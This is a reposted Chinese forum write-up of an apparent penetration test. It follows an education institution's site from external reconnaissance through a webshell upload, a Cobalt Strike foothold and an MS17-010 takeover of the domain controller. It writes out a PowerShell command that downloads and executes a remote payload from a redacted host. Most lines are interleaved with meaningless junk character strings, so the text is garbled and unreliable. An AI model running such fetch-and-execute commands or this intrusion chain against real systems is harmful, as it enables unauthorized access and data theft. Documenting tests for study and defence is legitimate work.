|
& ?$ _' N! o; z' }, e2 \
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路# Q: {$ w: C# @$ Y
5 d5 n: z6 W# _6 e% |$ w# ^3 Z* l2 H/ D" c
/ x% M( G1 S9 W* S
( ]8 w; K! ?! V( K: T2 u/ o$ t* p" `7 b; o# l l, `
正文' [* J0 F3 P. d3 a
0 `9 \; N2 ?3 k8 N( _
8 A0 ~- q4 u- ~3 @8 z7 K
1 e3 f# \, ^, |2 {1 {
2 }; t3 p4 l5 E+ w8 i
) _6 B9 Q, ~/ O4 u 目标:www.xxxx.com(一家教育机构)
$ W% k, c0 ~5 \6 N8 {4 v$ X# F打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 S* m! ^0 X7 g6 S; N* f* f$ b1 Z( h
3 w8 U1 ?& a' ~* f8 N' S
4 T$ I% ?9 m, z7 \# N  - N5 j- U* T) p" e4 x7 h
; z2 a# l! D/ _! c, @7 y* D
' ^' N3 a' x" A! a$ L
进行了简单的信息搜集
) s0 R7 `6 x5 R) ?3 U" Z6 N
' p; \" T6 G* F3 |" E
$ [$ n+ i% x5 Z( S0 |
2 }* c- o6 S& k. d( m7 }6 h0 j/ ^6 y8 \/ g S* j
子域名搜集
5 t- [& {6 }7 R# N2 t6 T + ]4 [! s1 M/ T8 \' o r0 m
' o5 C; p/ P8 |9 z( O% H* [/ P
 " g6 B6 z+ B3 ~9 e) V& U
: J" O, r. a; q& o( n8 J0 l. I& A. L8 }; C$ N- h4 k( p6 _, @
fofa找资产
( u. p: |7 Q! `- n
) d, z, y& _( c7 ?% [" P
1 J q0 O; L8 H8 o" i0 R 4 |( ^6 {- Y) X) V3 l2 U
2 Y. _& U' S, F1 E- T
 $ P- i. |. q' _5 ?
9 D" ^$ u9 V* x' O& S3 C
0 l0 n6 G1 C4 K7 o 一共七个资产。去重之后只有两个。
4 U L" e* {4 [3 \
! ^: a# ~* I3 i9 A* A) _3 U$ v
8 G/ o |7 r5 O, I
6 m, ~) E4 Y' z% C' g 目录探测
$ z. h) W z; r" U2 Z
/ h6 k0 A! y: z5 L% O- b
' u ]* W/ I: q5 U6 o  9 p1 j+ c+ ?3 L" x+ R3 h
* C& X) }/ k. K$ j$ |; t* X& |+ B+ x0 \2 B- Z4 A
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 Z+ I: ~( B: |: i, `
+ h1 t0 H1 h$ o2 X* B
5 O, ^4 g4 N: G8 @% n. h8 d
R, R1 Y' d& t: H2 i4 v" J% \: Q9 N0 Y3 I
我又尝试了通过修改返回包来绕过登录界面
# @5 D8 y4 s, p; E
9 U' ?5 p* M- I# ]" F6 m/ [
3 W, G. t/ E6 V& b 
% W5 L9 V9 O- f( U C7 T# e9 Y6 h
' n$ R. n! H2 t9 `- w9 ^+ Y0 W( k/ C8 g4 a/ C' ~
还是不行,尝试注入无果
% ]& t( Y) w0 l, N/ E% A" u! \ . O" m) _6 `( [4 I7 A- P a
% f3 N# c7 u, x5 s* u. w 
" e1 n. I6 I' Y6 X- Q" {" R 0 Q8 w3 f/ X3 d" `" b5 ~
- E% b4 N9 @" [9 z/ K3 @# g& c. F 不过我目录探测出了一处Spring信息泄露
; B3 K$ S6 L" Q* } y" Z9 _
) P7 p0 Q" K1 q1 v( t
4 q4 I! S4 c; _ + A: L/ D/ u6 `8 A6 o, P
- E2 Q0 k; M7 O% Q E. W, M$ y  % ]8 l, s0 s7 A: @, a9 A# M
: i0 N/ ?* K' A" T- Q/ |1 T5 ]
2 ^4 G. G9 Q. K 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
6 u1 m6 |( e% I' I - U+ J- ?. m1 D k* A/ Z7 ^; p
# [+ S a! x, A: X. D) |
[' P$ v" r5 T$ N* W* G
) b% i' C0 x: L4 ]" v
4 I1 u8 E7 {5 \5 H, z 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
U1 U8 k# w \& [ 4 i2 c, s6 a# V6 {2 q: {. Z
1 Y0 |/ T! @" ^
 - T2 l2 C$ Y! m
; n5 X) Q D# O0 T( _$ `' z- \
) B+ ^, T* r1 N5 r) m5 \; Q 获取有些师傅到这一步就手机抓包电脑测了。
; I7 B D, N" f% g5 Q9 l7 a5 S
8 _! ] s: h+ ~6 l7 I! ]# d
1 f7 b1 f, R/ b* F) F9 G1 N3 M) w Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。& f6 A) L3 `, e2 w' n) `
6 S" y$ h1 o1 j2 a! W5 P' e; s
; E+ I' s9 j6 E5 T 其中在一个公众号发现了小程序,可以进行注册。) A/ X, N. o# @" s) f5 M
/ L# p; a E9 z! x
3 r! l& q4 _! a6 s- d 看到了头像上传,尝试上传获取WebShell
' ]; R1 B, h- ? X
, Y8 J! y4 X6 `9 d6 K
) w6 i% w2 u- G5 A. s" [4 @+ n 
7 L* O6 u! p( L8 `1 b7 D ' O. C1 W- E4 j$ K
$ V- t% U1 W3 i' r4 Y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问. |8 R. Y$ R3 R' j& x
m& E% e0 }, d" l/ N! H, Z
5 |9 L( i# `! c" N. R1 y 
+ Z( ~& |5 I. n+ b8 l0 G) Y1 W* _3 s
- Q, h' V" T, c7 a$ b6 j# z* w3 A. u' ]+ c
然后上了大马
1 h, R. X5 M( ]5 z% M I# k# `( Z
- z9 }3 p+ n- q0 p8 j$ `
- C: s1 j" }; o  ' p6 k* X4 @% [
9 m4 X1 `# K" J1 n
% n/ [ B9 l( H; `' @: y  3 Y. Y4 M) Y m$ L: L f0 i) z
. w" \" ]" x. Z# [, u4 x& [6 A% |) X& u. R
通过翻找文件发现数据库账号密码( E8 p: D( g4 a: e1 Z' j8 B! m
+ s, U! Q( Y1 [& S1 }+ y+ d
" v% S- o- j K8 b( C/ Q  9 u! P' ]! ^* [! g1 O
0 b" c7 G: A/ X4 m+ |
' v7 d9 h9 `1 P/ ^0 R( t: X --内网渗透
! |- e& a+ }" f3 \& y/ v$ \
7 @1 |" z& {; ]; F) g* R; i- U7 Q0 i9 e: u
# {6 _/ H8 ]+ V. g: k" {# _5 g 直接通过powershell执行 cs上线
9 C( Q& N% ]8 b: N4 @8 M - _" f/ j; [7 F" B% H3 z" |
/ X# | ~& i% ^6 ]$ Z
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
: o# d. }( W. l& a
0 b* A6 h( Y$ h8 w' c" x; i! Z- f( v1 t
 . x* P, [( \/ V8 I0 D
9 A& p. o- u( f/ N. a# v& y* s( G% |1 a0 i
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, E' [6 m" p1 h. v, e) N
& S4 d$ V9 r. W2 Z
; n9 G$ v( B, j
 1 q' a; n" g1 g8 A: R
7 V- T0 t3 J- C6 J1 l& M" B
5 r& t2 v- e+ L9 p 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, p1 ^& Y/ @' i& y+ X1 e
U5 G7 [( m9 p& {, o9 q* k- ~: F
4 {) S* ?) w( d( J
+ N: {- Y9 b4 ?" @$ F % Y6 D; M {. `" y8 W% `+ Z( j( u
j7 t" W! q. o$ p9 e, e 
9 t. @2 t0 Q$ a) j: C- t Z- K+ }. H) }2 T0 a! a# e
/ P! A3 z" P" R 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
l8 v+ f+ T4 G: ^( `2 v3 J
2 _; z- i" R$ P5 w$ C1 `" f/ @& W% `
3 Q1 ?% K4 L4 u; T1 k: Q2 B
1 r3 [5 ]$ J! F$ w* A) l# H5 h4 P/ ^ 
1 V: o1 I5 f% k! j
5 P1 Z( Y5 Y' S3 w: ?0 a! Z( p
: i6 w G4 ]% X# v. Y5 c, Y
^# Z- [7 T8 ]1 d# i. o; S
+ K8 R( [6 o- H6 X1 A
: p1 p0 k) r8 V7 d! D) _
7 ~6 f% g" D2 W \/ ~
4 @$ n; W0 r7 R* z
( @5 X7 C. q6 }) }1 c
9 c7 m; y4 Q8 [ V! W
# \/ n$ B* \! N: @2 c
小结
$ N! G& E# X, u' w
4 k+ Q8 f/ v, I: h
% _8 M9 {6 N. t* J4 y
- c: A0 Z) c0 ? $ B3 t* K9 y: h" Z+ k; k6 g
: s4 @( q- ~9 ]$ P& T" b) u" } 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!) S2 ]7 ~- j$ {3 V% s
! s/ j8 g% K/ S* R. l* {, m
) `: F) x( w* i% @. W
+ ~& B" x! \5 [
1 J, V" o v6 ~( H) M2 O
U! b# j% h7 l g4 D2 i! P - 5 J! z9 r4 j |
/ Z. Q$ A( r3 F) Q' `6 C
7 q D. ~% E, O' M3 @) S9 D% T
-
$ x+ l* `5 H1 n. H * A7 F, z% W: A4 q6 w) C
5 \* |, Z# _& h4 t4 Y
) }* N; H1 ^0 A% d
+ e$ K: f' M4 h: [9 e
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
5 |6 S: |" z" H 0 {3 x3 m$ T5 d' u
9 H B9 Q! Q5 E0 |' d& R) t- J 7 P9 _3 C7 l$ E6 e" @5 P
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对